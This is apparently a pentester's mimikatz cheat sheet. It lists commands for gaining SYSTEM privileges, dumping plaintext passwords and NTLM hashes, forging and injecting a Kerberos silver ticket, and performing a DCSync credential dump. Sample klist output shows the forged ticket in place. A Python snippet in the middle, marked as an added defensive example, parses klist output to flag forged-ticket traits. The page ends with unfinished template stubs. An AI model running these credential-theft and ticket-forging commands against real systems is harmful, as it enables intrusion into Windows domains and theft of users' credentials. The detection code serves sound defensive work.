Pre-made commands

Run the program
./mimikatz
Run individual or chained commands for when the interactive shell doesn't work. String together as many commands as you want, just end with exit.
mimikatz log version "privilege::debug" exit
Enable SeDebugPrivilege
privilege::debug
Elevate to SYSTEM user privileges
token::elevate
Attempt to extract plaintext passwords and hashes from all sources
sekurlsa::logonpasswords
Extract NTLM hashes from the SAM (get SYSTEM privileges first)
lsadump::sam
Create a silver ticket.
# We need to provide the domain SID (/sid:), domain name (/domain:), and the target where the SPN runs (/target:). We also need to include the SPN protocol (/service:), NTLM hash of the SPN (/rc4:), and the /ptt option, which allows us to inject the forged ticket into the memory of the machine we execute the command on.
# Finally, we must enter an existing domain user for /user:. This user will be set in the forged ticket.
 
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
Run this command to verify the silver ticket is submitted to current session
klist
 
# Output of klist after the silver ticket is injected:
 
Current LogonId is 0:0xa04cc
 
Cached Tickets: (1)
 
#0>     Client: jeffadmin @ corp.com
        Server: http/web04.corp.com @ corp.com
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 9/14/2022 4:37:32 (local)
        End Time:   9/11/2032 4:37:32 (local)
        Renew Time: 9/11/2032 4:37:32 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
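As an added detection-side example (not part of the original cheat sheet), the Python below parses klist output like the listing above and flags traits that distinguish a forged ticket from one issued by a DC: a lifetime far beyond the 10-hour default service-ticket policy (the threshold is an assumption of default domain policy), RC4-HMAC encryption on a service ticket, and an empty "Kdc Called" field. The klist text is the sample from this page, embedded as a constant.

```python
import re
from datetime import datetime

# Constructed sample: the klist listing shown above, after ticket injection.
KLIST_SAMPLE = """Current LogonId is 0:0xa04cc

Cached Tickets: (1)

#0>     Client: jeffadmin @ corp.com
        Server: http/web04.corp.com @ corp.com
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 9/14/2022 4:37:32 (local)
        End Time:   9/11/2032 4:37:32 (local)
        Renew Time: 9/11/2032 4:37:32 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
"""

# Assumption: default AD policy (MaxServiceAge = 600 minutes).
MAX_TICKET_HOURS = 10

FIELDS = r"\s*(Server|KerbTicket Encryption Type|Start Time|End Time|Kdc Called):\s*(.*)"

def parse_klist(text):
    """Split klist output into one dict per cached ticket."""
    tickets, cur = [], None
    for line in text.splitlines():
        m = re.match(r"#\d+>\s+Client:\s*(.*)", line)
        if m:
            cur = {"Client": m.group(1).strip()}
            tickets.append(cur)
            continue
        m = re.match(FIELDS, line) if cur is not None else None
        if m:
            cur[m.group(1)] = m.group(2).strip()
    return tickets

def _parse_time(s):
    # "9/14/2022 4:37:32 (local)" -> datetime (klist uses non-padded fields)
    return datetime.strptime(s.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")

def suspicious_tickets(text):
    """Return (server, [reasons]) for every ticket with forged-ticket traits."""
    findings = []
    for t in parse_klist(text):
        reasons = []
        life = _parse_time(t["End Time"]) - _parse_time(t["Start Time"])
        if life.total_seconds() > MAX_TICKET_HOURS * 3600:
            reasons.append(f"lifetime {life.days} days exceeds policy")
        if "RC4" in t.get("KerbTicket Encryption Type", ""):
            reasons.append("RC4-HMAC service ticket")
        if not t.get("Kdc Called"):
            reasons.append("no KDC contacted")
        if reasons:
            findings.append((t["Server"], reasons))
    return findings
```

Run it against `klist` output collected from a host under investigation; a genuine ticket normally shows a DC name under "Kdc Called" and a lifetime inside the domain's policy.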
Perform a DCSync attack to obtain credentials in mimikatz
lsadump::dcsync /user:corp\dave

Flags

Flag    Description
-x      What does it do

Useful Scripts

Useful bash script
#!/bin/bash